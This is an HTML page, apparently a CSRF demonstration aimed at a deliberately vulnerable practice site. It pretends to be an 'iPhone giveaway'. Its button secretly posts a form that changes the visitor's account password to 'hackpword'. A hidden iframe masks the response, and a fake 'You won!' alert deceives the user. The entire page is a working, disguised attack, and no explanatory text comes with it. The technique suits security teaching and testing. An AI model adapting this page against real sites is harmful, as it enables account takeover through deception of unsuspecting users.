<!DOCTYPE html>
<html>
<head>
  <title>Win an iPhone!!!</title>
</head>
<body style="text-align: center;">

  <h1 style="font-size: 1.7em;">Want to win an iPhone? Of course you do! Click the button below and it's yours!!!</h1>

  <form action="https://hackyourselffirst.troyhunt.com/Account/ChangePassword" method="POST" target="hiddenFrame">
    <input type="hidden" name="NewPassword" value="hackpword" />
    <input type="hidden" name="ConfirmPassword" value="hackpword" />
    <input type="submit" value="I wanna win!" onclick="alert('You won! Click ok and it\'s done')" style="font-size: 2em;" />
  </form>

  <p>
    <img src="/Images/iPhone.jpg" style="width: 900px;" />
  </p>

  <iframe name="hiddenFrame" style="display: none;"></iframe>

</body>
</html>
